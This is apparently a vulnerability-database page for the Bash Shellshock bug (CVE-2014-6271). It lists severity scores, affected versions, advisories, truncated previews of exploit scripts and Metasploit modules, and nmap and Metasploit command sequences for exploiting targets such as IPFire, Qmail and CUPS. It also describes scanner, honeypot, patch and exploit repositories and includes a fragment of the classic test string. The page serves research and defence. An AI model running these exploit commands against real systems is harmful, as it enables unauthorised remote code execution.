10
CVSSv2

CVE-2014-6271

Published: 24/09/2014 Updated: 09/10/2019
CVSS v2 Base Score: 10 | Impact Score: 10 | Exploitability Score: 10
CVSS v3 Base Score: 9.8 | Impact Score: 5.9 | Exploitability Score: 3.9
VMScore: 1000
Vector: AV:N/AC:L/Au:N/C:C/I:C/A:C

Vulnerability Summary

GNU Bash up to and including 4.3 processes trailing strings after function definitions in the values of environment variables, which allows remote malicious users to execute arbitrary code via a crafted environment, as demonstrated by vectors involving the ForceCommand feature in OpenSSH sshd, the mod_cgi and mod_cgid modules in the Apache HTTP Server, scripts executed by unspecified DHCP clients, and other situations in which setting the environment occurs across a privilege boundary from Bash execution, aka "ShellShock." NOTE: the original fix for this issue was incorrect; CVE-2014-7169 has been assigned to cover the vulnerability that is still present after the incorrect fix.

Vulnerability Trend

Vulnerable Product Search on Vulmon Subscribe to Product

gnu bash 1.14.0

gnu bash 1.14.1

gnu bash 1.14.2

gnu bash 1.14.3

gnu bash 1.14.4

gnu bash 1.14.5

gnu bash 1.14.6

gnu bash 1.14.7

gnu bash 2.0

gnu bash 2.01

gnu bash 2.01.1

gnu bash 2.02

gnu bash 2.02.1

gnu bash 2.03

gnu bash 2.04

gnu bash 2.05

gnu bash 3.0

gnu bash 3.0.16

gnu bash 3.1

gnu bash 3.2

gnu bash 3.2.48

gnu bash 4.0

gnu bash 4.1

gnu bash 4.2

gnu bash 4.3

Vendor Advisories

Bash allowed bypassing environment restrictions in certain environments ...
Stephane Chazelas discovered a vulnerability in bash, the GNU Bourne-Again Shell, related to how environment variables are processed In many common configurations, this vulnerability is exploitable over the network, especially if bash has been configured as the system shell For the stable distribution (wheezy), this problem has been fixed in vers ...
Debian Bug report logs - #762760 bash: CVE-2014-7169: Incomplete fix for CVE-2014-6271 Package: bash; Maintainer for bash is Matthias Klose <doko@debianorg>; Source for bash is src:bash (PTS, buildd, popcon) Reported by: "brian m carlson" <sandals@crustytoothpastenet> Date: Wed, 24 Sep 2014 23:45:02 UTC Severity: ...
Tavis Ormandy discovered that the patch applied to fix CVE-2014-6271 released in DSA-3032-1 for bash, the GNU Bourne-Again Shell, was incomplete and could still allow some characters to be injected into another environment (CVE-2014-7169) With this update prefix and suffix for environment variable names which contain shell functions are added as h ...
A flaw was found in the way Bash evaluated certain specially crafted environment variables An attacker could use this flaw to override or bypass environment restrictions to execute shell commands Certain services and applications allow remote unauthenticated attackers to provide environment variables, allowing them to exploit this issue We'd lik ...
A flaw was found in the way Bash evaluated certain specially crafted environment variables An attacker could use this flaw to override or bypass environment restrictions to execute shell commands Certain services and applications allow remote unauthenticated attackers to provide environment variables, allowing them to exploit this issue ...

Exploits

## ## This module requires Metasploit: metasploitcom/download ## Current source: githubcom/rapid7/metasploit-framework ### require 'msf/core' class MetasploitModule < Msf::Exploit::Remote include Msf::Exploit::Remote::HttpClient def initialize(info = {}) super( update_info( info, 'Name' ...
#!/usr/bin/env python # RedStar OS 30 Server (BEAM & RSSMON) shellshock exploit # ======================================================== # BEAM & RSSMON are Webmin based configuration utilities # that ship with RSS server 30 These packages are the # recommended GUI configuration components and listen on # a user specified port from 100 ...
## # This module requires Metasploit: metasploitcom/download # Current source: githubcom/rapid7/metasploit-framework ## class MetasploitModule < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::Remote::Smtp def initialize(info={}) super(update_info(info, 'Name' => 'Qmail SMTP Bash E ...
#!/usr/bin/env python # TrendMicro InterScan Web Security Virtul Appliance # ================================================== # InterScan Web Security is a software virtual appliance that # dynamically protects against the ever-growing flood of web # threats at the Internet gateway exclusively designed to secure # you against traditional and e ...
## # This module requires Metasploit: metasploitcom/download # Current source: githubcom/rapid7/metasploit-framework ## require 'msf/core' class Metasploit4 < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient def initialize(info = {}) super(update_info(info, 'Name' => 'Ad ...
#! /usr/bin/env python from socket import * from threading import Thread import thread, time, httplib, urllib, sys stop = False proxyhost = "" proxyport = 0 def usage(): print """ Shellshock apache mod_cgi remote exploit Usage: /exploitpy var=<value> Vars: rhost: victim host rport: victim port for TCP shell binding lhost: attacker ...
Vantage Point Security Advisory 2015-001 ======================================== Title: Cisco Unified Communications Manager Multiple Vulnerabilities Vendor: Cisco Vendor URL: wwwciscocom/ Versions affected: <92, <1052, <1101 Severity: Low to medium Vendor notified: Yes Reported: Oct 2014 Public release: Aug 13th, 2015 ...
<?php /* Title: Bash Specially-crafted Environment Variables Code Injection Vulnerability CVE: 2014-6271 Vendor Homepage: wwwgnuorg/software/bash/ Author: Prakhar Prasad && Subho Halder Author Homepage: prakharprasadcom && appknoxcom Date: September 25th 2014 Tested on: Mac OS X 1094/1095 with Apac ...
# Exploit Title: QNAP admin shell via Bash Environment Variable Code Injection # Date: 7 February 2015 # Exploit Author: Patrick Pellegrino | 0x700x700x650x6c0x6c0x650x670x720x690x6e0x6f@securegroupit [work] / 0x640x330x760x620x700x70@gmailcom [other] # Employer homepage: wwwsecuregroupit # Vendor homepage: wwwqnapcom # Version: ...
## # This module requires Metasploit: metasploitcom/download # Current source: githubcom/rapid7/metasploit-framework ## require 'msf/core' class Metasploit4 < Msf::Exploit::Remote Rank = GoodRanking include Msf::Exploit::Remote::HttpClient def initialize(info = {}) super(update_info(info, 'Name' => 'CUPS Fi ...
## # This module requires Metasploit: http//metasploitcom/download # Current source: githubcom/rapid7/metasploit-framework ## require 'msf/core' class Metasploit4 < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::Ftp include Msf::Exploit::CmdStager def initialize(info = {}) super(update_info(i ...
# Exploit Title: ShellShock OpenVPN Exploit # Date: Fri Oct 3 15:48:08 EDT 2014 # Exploit Author: hobbily AKA @fj33r # Version: 2229 # Tested on: Debian Linux # CVE : CVE-2014-6271 #Probably should of submitted this the day I tweeted it ### serverconf port 1194 proto udp dev tun client-cert-not-required auth-user-pass-verify /etc/openvpn ...
# Exploit Title: PHP 5x Shellshock Exploit (bypass disable_functions) # Google Dork: none # Date: 10/31/2014 # Exploit Author: Ryan King (Starfall) # Vendor Homepage: phpnet # Software Link: phpnet/get/php-562tarbz2/from/a/mirror # Version: 5* (tested on 562) # Tested on: Debian 7 and CentOS 5 and 6 # CVE: CVE-2014-6271 < ...
require 'msf/core' class Metasploit3 < Msf::Auxiliary include Msf::Exploit::Remote::HttpClient def initialize(info = {}) super(update_info(info, 'Name' => 'bashedCgi', 'Description' => %q{ Quick & dirty module to send the BASH ex ...
# Exploit Title: QNAP Web server remote code execution via Bash Environment Variable Code Injection # Date: 7 February 2015 # Exploit Author: Patrick Pellegrino | 0x700x700x650x6c0x6c0x650x670x720x690x6e0x6f@securegroupit [work] / 0x640x330x760x620x700x70@gmailcom [other] # Employer homepage: wwwsecuregroupit # Vendor homepage: ww ...
## # This module requires Metasploit: http//metasploitcom/download # Current source: githubcom/rapid7/metasploit-framework ## require 'msf/core' class Metasploit3 < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient include Msf::Exploit::EXE def initialize(info = {}) super(update_info ...
Exploit Database Note: The following is an excerpt from: securityblogredhatcom/2014/09/24/bash-specially-crafted-environment-variables-code-injection-attack/ Like “real” programming languages, Bash has functions, though in a somewhat limited implementation, and it is possible to put these bash functions into environment variables Th ...
#!/usr/bin/env python # # Exploit Title : IPFire <= 215 core 82 Authenticated cgi Remote Command Injection (ShellShock) # # Exploit Author : Claudio Viviani # # Vendor Homepage : wwwipfireorg # # Software Link: downloadsipfireorg/releases/ipfire-2x/215-core82/ipfire-215i586-full-core82iso # # Date : 2014-09-29 # # Fixed v ...
#!/bin/python # Exploit Title: Shellshock SMTP Exploit # Date: 10/3/2014 # Exploit Author: fattymcwopr # Vendor Homepage: gnuorg # Software Link: ftpgnuorg/gnu/bash/ # Version: 42x < 4248 # Tested on: Debian 7 (postfix smtp server w/procmail) # CVE : 2014-6271 from socket import * import sys def usage(): print "shellshock_sm ...
# Exploit Title: Kemp Load Master - Multiple Vulnerabilities (RCE, CSRF, XSS, DoS) # Date: 01 April 2015 # Author: Roberto Suggi Liverani # Software Link: kemptechnologiescom/load-balancer/ # Version: 7116 and previous versions # Tested on: Kemp Load Master 71-16 # CVE : CVE-2014-5287/5288 Link: blogmalerischnet/2015/04/playing ...
#!/usr/bin/python # Exploit Title: dhclient shellshocker # Google Dork: n/a # Date: 10/1/14 # Exploit Author: @0x00string # Vendor Homepage: gnuorg # Software Link: ftpgnuorg/gnu/bash/bash-43targz # Version: 4311 # Tested on: Ubuntu 14041 # CVE : CVE-2014-6277,CVE-2014-6278,CVE-2014-7169,CVE-2014-7186,CVE-2014-7187 # ______ ...

Mailing Lists

GNU Bash versions 43 and below remote command injection exploit that leverages the REFERER header on vulnerable CGI scripts Launches a connect-back shell Written in Perl ...
IPFire, a free linux based open source firewall distribution, versions 215 Update Core 82 and below contain an authenticated remote command execution vulnerability via shellshock in the request headers ...
IPFire versions 215 and below core 82 authenticated CGI remote command injection exploit that leverages the bash vulnerability ...
Cisco Unified Communications Manager versions prior to 1101, 1052, and 92 suffer from multiple command execution vulnerabilities ...
This abuses the bug in bash environment variables (CVE-2014-6271) to get a suid binary inside of VMWare Fusion to launch our payload as root ...
This Metasploit module exploits the Shellshock vulnerability, a flaw in how the Bash shell handles external environment variables This Metasploit module targets the 'pingsh' CGI script, accessible through the Boa web server on Advantech switches This Metasploit module was tested against firmware version 1322_D198 ...
AIS shellshock scanning tool that leverages the User-Agent header against a large list of possible targets Written in C ...
This is a proof of concept that demonstrates how the Bash shellshock vulnerability can be used in PHP to bypass disable_functions, safe_mode, etc ...
bashedCgi is a quick and dirty Metasploit module to send the BASH exploit payload (CVE-2014-6271) to CGI scripts that are BASH-based or invoke BASH, to execute an arbitrary shell command ...
TrendMicro InterScan Web Security Virtual Appliance remote code execution exploit that leverages the shellshock vulnerability to spawn a connect-back shell TrendMicro has contacted Packet Storm and provided the following link with patch information: <a href="successtrendmicrocom/solution/1105233">successtrendmicrocom/solu ...
FutureNet NXR-G240 Series remote shellshock command injection exploit ...
This is a shellshock exploit for RSSMON and BEAM, network services for Red Star OS version 30 SERVER edition ...
Due to a processing issue with environment variables it is possible to leverage bash for command execution through various methodologies ...
Staubli Jacquard Industrial System JC6 suffers from a bash environment variable handling code injection vulnerability ...
This Metasploit module exploits a post-auth code injection in specially crafted environment variables in Bash, specifically targeting CUPS filters through the PRINTER_INFO and PRINTER_LOCATION variables by default ...
This is information regarding more bash vulnerabilities and how the original bash patches are ineffective ...
DNS reverse lookups can be used as a vector of attack for the bash shellshock vulnerability ...

Nmap Scripts

http-shellshock

Attempts to exploit the "shellshock" vulnerability (CVE-2014-6271 and CVE-2014-7169) in web applications.

nmap -sV -p- --script http-shellshock <target>
nmap -sV -p- --script http-shellshock --script-args uri=/cgi-bin/bin,cmd=ls <target>

PORT STATE SERVICE REASON 80/tcp open http syn-ack | http-shellshock: | VULNERABLE: | HTTP Shellshock vulnerability | State: VULNERABLE (Exploitable) | IDs: CVE:CVE-2014-6271 | This web application might be affected by the vulnerability known as Shellshock. It seems the server | is executing commands injected via malicious HTTP headers. | | Disclosure date: 2014-09-24 | References: | http://www.openwall.com/lists/oss-security/2014/09/24/10 | https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-7169 | http://seclists.org/oss-sec/2014/q3/685 |_ http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-6271

Metasploit Modules

IPFire Bash Environment Variable Injection (Shellshock)

IPFire, a free linux based open source firewall distribution, version <= 2.15 Update Core 82 contains an authenticated remote command execution vulnerability via shellshock in the request headers.

msf > use exploit/linux/http/ipfire_bashbug_exec
      msf exploit(ipfire_bashbug_exec) > show targets
            ...targets...
      msf exploit(ipfire_bashbug_exec) > set TARGET <target-id>
      msf exploit(ipfire_bashbug_exec) > show options
            ...show and set options...
      msf exploit(ipfire_bashbug_exec) > exploit
DHCP Client Bash Environment Variable Code Injection (Shellshock)

This module exploits the Shellshock vulnerability, a flaw in how the Bash shell handles external environment variables. This module targets dhclient by responding to DHCP requests with a malicious hostname, domainname, and URL which are then passed to the configuration scripts as environment variables, resulting in code execution.

msf > use auxiliary/server/dhclient_bash_env
      msf auxiliary(dhclient_bash_env) > show actions
            ...actions...
      msf auxiliary(dhclient_bash_env) > set ACTION <action-name>
      msf auxiliary(dhclient_bash_env) > show options
            ...show and set options...
      msf auxiliary(dhclient_bash_env) > run
Advantech Switch Bash Environment Variable Code Injection (Shellshock)

This module exploits the Shellshock vulnerability, a flaw in how the Bash shell handles external environment variables. This module targets the 'ping.sh' CGI script, accessible through the Boa web server on Advantech switches. This module was tested against firmware version 1322_D1.98.

msf > use exploit/linux/http/advantech_switch_bash_env_exec
      msf exploit(advantech_switch_bash_env_exec) > show targets
            ...targets...
      msf exploit(advantech_switch_bash_env_exec) > set TARGET <target-id>
      msf exploit(advantech_switch_bash_env_exec) > show options
            ...show and set options...
      msf exploit(advantech_switch_bash_env_exec) > exploit
OS X VMWare Fusion Privilege Escalation via Bash Environment Code Injection (Shellshock)

This module exploits the Shellshock vulnerability, a flaw in how the Bash shell handles external environment variables. This module targets the VMWare Fusion application, allowing an unprivileged local user to get root access.

msf > use exploit/osx/local/vmware_bash_function_root
      msf exploit(vmware_bash_function_root) > show targets
            ...targets...
      msf exploit(vmware_bash_function_root) > set TARGET <target-id>
      msf exploit(vmware_bash_function_root) > show options
            ...show and set options...
      msf exploit(vmware_bash_function_root) > exploit
Qmail SMTP Bash Environment Variable Injection (Shellshock)

This module exploits a shellshock vulnerability on Qmail, a public domain MTA written in C that runs on Unix systems. Due to the lack of validation on the MAIL FROM field, it is possible to execute shell code on a system with a vulnerable BASH (Shellshock). This flaw works on the latest Qmail versions (qmail-1.03 and netqmail-1.06). However, in order to execute code, /bin/sh has to be linked to bash (usually default configuration) and a valid recipient must be set on the RCPT TO field (usually admin@exampledomain.com). The exploit does not work on the "qmailrocks" community version as it ensures the MAILFROM field is well-formed.

msf > use exploit/unix/smtp/qmail_bash_env_exec
      msf exploit(qmail_bash_env_exec) > show targets
            ...targets...
      msf exploit(qmail_bash_env_exec) > set TARGET <target-id>
      msf exploit(qmail_bash_env_exec) > show options
            ...show and set options...
      msf exploit(qmail_bash_env_exec) > exploit
Pure-FTPd External Authentication Bash Environment Variable Code Injection (Shellshock)

This module exploits the Shellshock vulnerability, a flaw in how the Bash shell handles external environment variables. This module targets the Pure-FTPd FTP server when it has been compiled with the --with-extauth flag and an external Bash script is used for authentication. If the server is not set up this way, the exploit will fail, even if the version of Bash in use is vulnerable.

msf > use exploit/multi/ftp/pureftpd_bash_env_exec
      msf exploit(pureftpd_bash_env_exec) > show targets
            ...targets...
      msf exploit(pureftpd_bash_env_exec) > set TARGET <target-id>
      msf exploit(pureftpd_bash_env_exec) > show options
            ...show and set options...
      msf exploit(pureftpd_bash_env_exec) > exploit
Dhclient Bash Environment Variable Injection (Shellshock)

This module exploits the Shellshock vulnerability, a flaw in how the Bash shell handles external environment variables. This module targets dhclient by responding to DHCP requests with a malicious hostname, domainname, and URL which are then passed to the configuration scripts as environment variables, resulting in code execution. Due to length restrictions and the unusual networking scenario at the time of exploitation, this module achieves code execution by writing the payload into /etc/crontab and then cleaning it up after a session is created.

msf > use exploit/unix/dhcp/bash_environment
      msf exploit(bash_environment) > show targets
            ...targets...
      msf exploit(bash_environment) > set TARGET <target-id>
      msf exploit(bash_environment) > show options
            ...show and set options...
      msf exploit(bash_environment) > exploit
Apache mod_cgi Bash Environment Variable Code Injection (Shellshock)

This module exploits the Shellshock vulnerability, a flaw in how the Bash shell handles external environment variables. This module targets CGI scripts in the Apache web server by setting the HTTP_USER_AGENT environment variable to a malicious function definition.

msf > use exploit/multi/http/apache_mod_cgi_bash_env_exec
      msf exploit(apache_mod_cgi_bash_env_exec) > show targets
            ...targets...
      msf exploit(apache_mod_cgi_bash_env_exec) > set TARGET <target-id>
      msf exploit(apache_mod_cgi_bash_env_exec) > show options
            ...show and set options...
      msf exploit(apache_mod_cgi_bash_env_exec) > exploit
Apache mod_cgi Bash Environment Variable Injection (Shellshock) Scanner

This module scans for the Shellshock vulnerability, a flaw in how the Bash shell handles external environment variables. This module targets CGI scripts in the Apache web server by setting the HTTP_USER_AGENT environment variable to a malicious function definition. PROTIP: Use exploit/multi/handler with a PAYLOAD appropriate to your CMD, set ExitOnSession false, run -j, and then run this module to create sessions on vulnerable hosts. Note that this is not the recommended method for obtaining shells. If you require sessions, please use the apache_mod_cgi_bash_env_exec exploit module instead.

msf > use auxiliary/scanner/http/apache_mod_cgi_bash_env
      msf auxiliary(apache_mod_cgi_bash_env) > show actions
            ...actions...
      msf auxiliary(apache_mod_cgi_bash_env) > set ACTION <action-name>
      msf auxiliary(apache_mod_cgi_bash_env) > show options
            ...show and set options...
      msf auxiliary(apache_mod_cgi_bash_env) > run
CUPS Filter Bash Environment Variable Code Injection (Shellshock)

This module exploits the Shellshock vulnerability, a flaw in how the Bash shell handles external environment variables. This module targets CUPS filters through the PRINTER_INFO and PRINTER_LOCATION variables. A valid username and password is required to exploit this vulnerability through CUPS.

msf > use exploit/multi/http/cups_bash_env_exec
      msf exploit(cups_bash_env_exec) > show targets
            ...targets...
      msf exploit(cups_bash_env_exec) > set TARGET <target-id>
      msf exploit(cups_bash_env_exec) > show options
            ...show and set options...
      msf exploit(cups_bash_env_exec) > exploit

Github Repositories

BSY bonus task report This report describes step by step solution of bonus task present in Security Systems course on Czech Technical University First stage We are receiving a pcap file, unique token, and server information as the entry point to this assignment — the pcap file you can find in this repo Other provided information is listed below server: 1921681167:

reading course

cve-2014-6271-huan-lu reading course

Attack Defend Exercise for Computer System Security

CSEC-742-Project Attack Defend Exercise for Computer System Security (RIT CSEC-742) Gain understanding and experience with vulnerabilities and exploitation Construct a vulnerable system for others to attack and configure a monitoring system to observe attacks Set up a VM, configure it to be susceptible to an exploit, and connect it to the private subnet in the RIT Virtual Lab

This Repo Contains Write-UPs for all Tasks

CTF tools &amp; Resources This Repo Contains Write-UPs for all Tasks HERE ARE SOME EXTREMELY USEFUL TOOLS AND COMMANDS Forensics, Linux Tools and Commands Web Misc OSINT Basic linux tools and Commands binwalk -e : //Extracts hidden files steghide extract -sf : //Extracts hidden text in the image xxd : //Prints the Hex version of file grep "element" //finds the

WebApp Honeypot for detecting Shell Shock exploit attempts

Shockpot Shockpot is a web app honeypot designed to find attackers attempting to exploit the Bash remote code vulnerability, CVE-2014-6271 Shockpot can be run as a standalone honypot or easily deployed by Modern Honey Network (MHN): githubcom/Pwnlandia/mhn Installation virtualenv env env/bin/activate pip install -r requirementstxt Configuration Edit shockpotconf

收集一些比较优秀的开源安全项目,以帮助甲方安全从业人员构建企业安全能力。

项目介绍 这是一份开源安全项目清单,收集了一些比较优秀的开源安全项目,以帮助甲方安全从业人员构建企业安全能力。 这些开源项目,每一个都在致力于解决一些安全问题。 项目收集的思路: 一个是关注互联网企业/团队的安全开源项目,经企业内部实践,这些最佳实践值得借鉴。

A simple python shell-like exploit for the Shellschok CVE-2014-6271 bug.

shellshock-shell A simple python shell-like exploit for the Shellschok CVE-2014-6271 bug Use it to exploit known vulnerable URLs This tool may be used only on your own authorized URLs The author of this tool takes no responsibility for its usage File name: shellshockpy Author: Sagi Levy - Sagi@pwnguycom Date created: 27/09/2014 Python Version: 27 Example: /shellshockpy

Common Vulnerabilities and Exposures DB and Python API

CVE DB About CVE DB is a sqlite DB with CVEs and Python API CVEs are scrapped from CVE Details Latest DB is from 17012017 Why? It seems there is no developer friendly CVE data available Usage DB Download latest sqlite DB from dbs and extract Python Updating DB with open('csv_listtxt', 'r') as csv_h: with CVE_DB() as db: for cve_na

Ansible role that configures a host to be a target in a cyber range

cyber-range-target This role endeavors to simplify building a host for a cyber range This role is for assessment purposes only Note: This has the potential to render a host vulnerable Use with care Requirements Ansible 24 Role Variables --- # defaults file for cyber-range-target # Which CVE's should be tested on a host cves_to_test: [] selinux_state: enforcing Depe

This is an Android Application that helps you detect if your machine that run bash is vulnerable by CVE-2014-6271

shellshocker-android This is an Android Application that helps you detect if your machine that run bash is vulnerable by CVE-2014-6271 Stefano Belli, &lt;(C) Copyleft, share, rebuild, modify, redistribuite as you think it should be better Google+: plusgooglecom/+StefanoBelli WebSite: wwwinthebitit Next update ready, i will upload nextly

Python library and utility for CVE-2014-6271 (aka. "shellshock")

pyshellshock Python library and utility for CVE-2014-6271

Python Scanner for "ShellShock" (CVE-2014-6271)

shellshock_scanner Python Scanner for "ShellShock" (CVE-2014-6271)

Tutorials Exploit Shellshock Vulnerability CVE 2014-6271 using Metasploit 11 Best Linux Distros for Ethical Hacking and Pentesting in 2020 Getting Started with Metasploit for Ethical Hacking Top 20 Most used Hacking and Pentesting Tools How to Route All Traffic Through Tor Network on Arch Linux Remote Network Penetration via Netbios using Linux and Samba How to Extract Data fr

Tutorials Exploit Shellshock Vulnerability CVE 2014-6271 using Metasploit

shellshock CVE-2014-6271 CGI Exploit, Use like Openssh via CGI

CGIShell shellshock CVE-2014-6271 CGI Exploit Use like OpenSSH via CGI Page Use python cgishellpy 'wwwgooglecom/cve-2014-6271/poccgi' Screenshot Dependence Windows needed pyreadline It is not needed chardet Future Add TestCase HTTP Login Support http transmission gzip compression chardet identify and decode any bug fix Issues Windows Untest

exploit-CVE-2014-6271 docker run --rm -d -p &lt;port&gt;:80 vulnerables/cve-2014-6271 sh exploit-clish &lt;ip&gt; &lt;port&gt; &lt;command&gt;

North Korea ICT 1 North Korea Internet 2 Redstar OS and Browser Redstar PC Redstar Server RedStar 30 Server - 'Shellshock' 'BEAM' / 'RSSMON' Command Injection [Exploit DB] wwwexploit-dbcom/exploits/40938/ [CVE-2014-6271] cvemitreorg/cgi-bin/cvenamecgi?name=cve-2014-6271 3 Security "See swsecurityml

Most Wanted Private and Public PHP Web Shells Can Be Downloaded Here. (Educational Purpose Only)

NOTICE DO NOT DOWNLOAD SHELLS FROM EXPLOIT OR PHPSHELL: All Web Shells Located at websites mentioned below are infected Exploit PHPShell The stuff they will download with their shells is listed below lamer Email address they used to collect logs is byhero44@gmailcom All shells from above mentioned sites send email to this email address instantly with your infected url a

Awesome Penetration Testing A collection of awesome penetration testing resources Online Resources Penetration Testing Resources Exploit development Social Engineering Resources Lock Picking Resources Tools Penetration Testing Distributions Basic Penetration Testing Tools Docker for Penetration Testing Vulnerability Scanners Network Tools Wireless Network Tools SSL Analysi

A collection of awesome software, libraries, documents, books, resources and cools stuffs about security.

Awesome Security A collection of awesome software, libraries, documents, books, resources and cool stuff about security Inspired by awesome-php, awesome-python Thanks to all contributors, you're awesome and wouldn't be possible without you! The goal is to build a categorized community-driven collection of very well-known resources Awesome Security Network Scann

渗透相关语法 相关漏洞学习资料,利用方法和技巧合集 web常见漏洞: 注入漏洞(HTML注入/代码注入/header头注入(CRLF)/sql注入/xml注入(xxe/wsdl)) 跨站XSS漏洞、安全配置错误、登录认证缺陷、越权、敏感信息泄露 权限控制不严格、请求伪造 (CSRF)、使用了存在漏洞的组件、点击劫持、SSRF 目录 Ha

Bonus assignment for BSY

Bonus assignment Author: Tomáš Hořovský Email: horovtom@felcvutcz This was the final bonus assignment for the BSY course at ČVUT Prague As an entry point for this assignment, we got a pcap file and an IP address of submission server Part 1 First, I went to the submission server and entered some random data to get all the different questions: What is

Ansible role to check the CVE-2014-6271 vulnerability

bash-fix-exploit A tiny role that checks to see if the CVE-2014-6271 exploit is still valid Use at your own risk Read about the exploit here: communityrapid7com/community/infosec/blog/2014/09/25/bash-ing-into-your-network-investigating-cve-2014-6271 Requirements Assumes that you're using bash as your shell Role Variables update_bash - defaults to "no

Shell Shock CVE-6271 test script

ss-6271 Shell Shock CVE-6271 test script This quickly-written script comes pre-packed with the October 2015 release update of Weakerthan Linux 6 I coded it after taking the Pentesterlab's course on CVE-6271 Shell Shock: (pentesterlabcom/exercises/cve-2014-6271/course) dependencies gnome-terminal nc Bash

ss-6271 Shell Shock CVE-6271 test script This quickly-written script comes pre-packed with the October 2015 release update of Weakerthan Linux 6 I coded it after taking the Pentesterlab's course on CVE-6271 Shell Shock: (pentesterlabcom/exercises/cve-2014-6271/course) dependencies gnome-terminal nc Bash

Shockpot Shockpot is a web app honeypot designed to find attackers attempting to exploit the Bash remote code vulnerability, CVE-2014-6271 Shockpot can be run as a standalone honypot or easily deployed by Modern Honey Network (MHN): githubcom/Pwnlandia/mhn Installation virtualenv env env/bin/activate pip install -r requirementstxt Configuration Edit shockpotconf

Aprovechar muchos métodos de inyección para shellshock.

Evil-Shock Description Evil-Shock is a powerful tool made to exploit Shellshock, what's special with Evil-Shock is that it doesn't base his attacks on one parameter, example another tool might inject a simple "echo Vulnerable" and see if the server executes that In many case the server wont execute that command but can execute another command ;) Evil-Shock

This is an individual assignment for secure network programming

CVE-2014-6271-Shellshock- This is an individual assignment for secure network programming

A multifunctional tool for checking and exploiting the Shellshock(a. k. a. Bashd00r) vulnerabilty. CVE 2014-6271. Created for Python 2.7.13.

SwissArmyShellshocker A multifunctional tool for checking and exploiting the Shellshock(a k a Bashd00r) vulnerabilty CVE 2014-6271

OS X bash-3.2 fix (with import-functions patch)

bash-32 for OS X 109 and 1010 NOTE WELL: This software is not applicable to 1011 unless disabling the File System Protections GNU bash for OS X Current version: 3257 NOTE: EXPERIMENTAL: functions from environment variables are NOT imported as default when the import-functions option is compiled The master branch has this option enabled, for better security You can v

Real time analysis of information security vulnerabilities

Security Threats and Analysis Real-time analysis of information security vulnerabilities Threat Name CVE-2014-6271 ShellShock

CVE-2014-6271 Usage go run CVE-2014-6271go wwwexamplecom 80 whoami

WebApp Honeypot for detecting Shell Shock exploit attempts

Shockpot Shockpot is a web app honeypot designed to find attackers attempting to exploit the Bash remote code vulnerability, CVE-2014-6271 Shockpot can be run as a standalone honypot or easily deployed by Modern Honey Network (MHN): githubcom/Pwnlandia/mhn Installation virtualenv env env/bin/activate pip install -r requirementstxt Configuration Edit shockpotconf

Chef cookbook that will fail if bash vulnerability found per CVE-2014-6271

bash-CVE-2014-6271 Cookbook This Chef cookbook contains a default recipe that will fail your Chef run if a bash is found and that bash is vulnerable to the remote exploit described in CVE-2014-6271 The places to look for bash can be configured in the node['bash-CVE-2014-6271']['bashes'] attribute (see below) Requirements Should work on any UNIX/Linux Pleas

another_shellshock_test Some scripts to test for the "ShellShock" vulnerability (CVE-2014-6271) The codename for this scripts is SHIT (SHellshock Injection Test) harrharr Please only use this script in environments where you are allowed to shellshock_localsh Test for the two known (by me) version of this vulnerability on the local system: env x='() { :;}; ec

Shellshock scanner for Apache MOD_CGI

Shellshock Burp Plugin A burp plugin to provide active scanning for CVE-2014-6271 against Apache's MOD_CGI Download Compiled to Java 6 for luddites and the like Download here! Building mvn package

An example on how to use Ansible to update your servers

update Bash on Debian / Ubuntu and RedHat I copied this code from raymiiorg/s/articles/Patch_CVE-2014-6271_Shellshock_with_Ansiblehtml Thanks to Remy van Elst for writing this code I wanted to learn Ansible for a while now and want to and this example was really helpful If you want to make this work for your servers, you'll need to have a an Ansible Inventory F

bro-scripts Find us on the web at wwwCriticalStackcom Check out our new Intel Marketplace for Bro Repository includes a set of Bro scripts to be shared with the community CVE-2014-6271 Exploit Detector- The CVE-2014-6271 vulnerability in the venerable Bourne-Again SHell (BASH) is rated as a Level 10 allowing full, unauthenticated remote access to your systems; it's g

A script, in C, to check if CGI scripts are vulnerable to CVE-2014-6271 (The Bash Bug)

ShellShock-CGI-Scan A script, in C, to check if CGI scripts are vulnerable to CVE-2014-6271 (The Bash Bug) Options: -i (local ip-address) -p (port to listen) -l (site list) -t (connection timeout) (Default: 15s) Example: $ /Scanner -i 127001 -p 31337 -l sitestxt -t 5 Starting listen in localhost on port 31337, scan sites in file 'sitestxt', and set connecti

A python script to enumerate CGI scripts vulnerable to CVE-2014-6271 on one specific server

shellshock-cgi A python script to enumerate CGI scripts vulnerable to CVE-2014-6271 on one specific server Usage $ python testingpy --server 17216255130 --listen 172162551 ##Example Return: [+] Testing if 17216255130 is vulnerable to CVE-2014-6271 via CGI [+] Listening for incoming connections on the following socket 172162551:4443 [!] The server is vulnerable a

CVE-2014-6271 Bash Shellshock (and Aftershock) Tester for Ansible Install Ansible docsansiblecom/intro_installationhtml Add servers to inventory file (example): username@ip Copy your public key to remote servers' ssh/authorized_keys execute test $ ansible-playbook -i inventory siteyml

A scanner for SIP proxies vulnerable to Shellshock

A scanner for SIP proxies vulnerable to Shellshock Usage: sipshock [ Flags ] [ IP Addresses ] Usage flags: lhost : Local listening address lport : Local listening port (default 10111) rport : Remote port (default 5060) The exec module in Kamailio, Opensips and propably every other SER fork passes the received SIP headers as environment variables to the invoking shell This

Shellshock Remote Command Execution

Shellshock ( Bash CVE-2014-6271 ) Remote Command Execution Injector Overview A critical vulnerability has been reported in the GNU Bourne-Again Shell (Bash), the common command-line shell used in many Linux/UNIX operating systems and Apple’s Mac OS X The flaw could allow an attacker to remotely execute shell commands by attaching malicious code in environment variables u

cve-2014-6271

CVE-2014-6271 This is part of Cved: a tool to manage vulnerable docker containers Cved: gitlabcom/git-rep/cved Image source: githubcom/cved-sources/cve-2014-6271 Image author: githubcom/Medicean/VulApps/tree/master/b/bash/shellshock1_CVE-2014-6271

Shellshock-Bash-Remote-Code-Execution-Vulnerability-and-Exploitation Before moving into the shellshock vulnerability, everyone should know about the bash environment So let move on the bash When your computer boots up, kernal will identify each and every hardwares and components which are enabled Each and every computers which are using UNIX kernal they will have this shell

